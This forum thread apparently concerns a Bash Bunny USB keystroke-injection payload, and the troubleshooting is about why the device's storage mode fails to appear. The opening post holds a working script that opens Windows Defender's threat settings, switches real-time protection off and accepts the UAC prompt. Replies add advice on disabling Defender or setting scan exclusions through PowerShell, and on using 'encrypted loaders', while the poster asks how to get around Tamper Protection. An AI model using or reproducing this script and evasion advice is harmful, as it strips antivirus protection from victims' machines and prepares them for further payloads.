SamSepi46 Posted January 30, 2022 Share Posted January 30, 2022 I'm trying to write a simple payload that involves manually disabling Windows defender. I need the 1st part of the payload to use ATTACKMODE HID and the 2nd part to use ATTACKMODE HID STORAGE. however the bash bunny never seems to show up as a flash drive for that second part of the payload. What am I doing wrong? #STAGE ONE LED B FAST ATTACKMODE HID Q GUI r Q DELAY 125 Q STRING windowsdefender://threat/ Q DELAY 125 Q ENTER Q DELAY 1000 Q TAB Q DELAY 1000 Q TAB Q DELAY 1000 Q TAB Q DELAY 1000 Q TAB Q DELAY 1000 Q ENTER Q DELAY 3000 Q SPACE Q DELAY 3000 Q ALT Y Q DELAY 50 Q ALT F4 Q DELAY 50 #STAGE 2 LED G FAST ATTACKMODE HID STORAGE Link to comment Share on other sites More sharing options...
dark_pyrro Posted January 31, 2022 Share Posted January 31, 2022 Are you using a Bunny Mk1 or Mk2? Anyway, it really doesn't matter, I think it's related to firmware. There must be some issue with some parts of the Bunny features (perhaps in the ATTACKMODE script itself, I haven't looked further into it). When I run both my Mk1 and Mk2 on the latest firmware (1.7_332) the script (or variants of it), doesn't work. If I downgrade my Mk1 to the base firmware of the Mk1 (1.0_167) then the script works.... You could submit a support ticket for this to try to get it sorted. Link to comment Share on other sites More sharing options...
NoExecute Posted January 31, 2022 Share Posted January 31, 2022 Just to be curious.. Why Storage ? If you want to play with defender, go through Powershell and disable it / set up directories it doesn't scan, then load your payload from HID / Storage mode. Depending on what you load, may I suggest encrypted loaders 🙂 Have fun ;) /NX Link to comment Share on other sites More sharing options...
SamSepi46 Posted January 31, 2022 Author Share Posted January 31, 2022 thank you both. Dark_Pyyro - I use the MK1, I assumed it was a firmware issue, but on the off chance it was user error (Totally possible) I wanted to make sure there wasn't anything I was missing. I used the responder payload a couple weeks back and ever since then the switches never quite worked properly. NoExecute - I tried to do it originally through powershell, but windows "Tamper protection" seems to block any change to the windows firewall or defender. Tamper protection seems to be the only thing preventing me from disabling defender with powershell. I'm interested in hearing more about Encrypted Loaders, I dont think I have ever messed with them before but if it means I can disable defender with powershell sign me up. Link to comment Share on other sites More sharing options...
Gwozd Posted February 5, 2022 Share Posted February 5, 2022 On 1/31/2022 at 3:13 PM, NoExecute said: Just to be curious.. Why Storage ? If you want to play with defender, go through Powershell and disable it / set up directories it doesn't scan, then load your payload from HID / Storage mode. Depending on what you load, may I suggest encrypted loaders 🙂 Have fun 😉 /NX I took your advice and it helped me. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.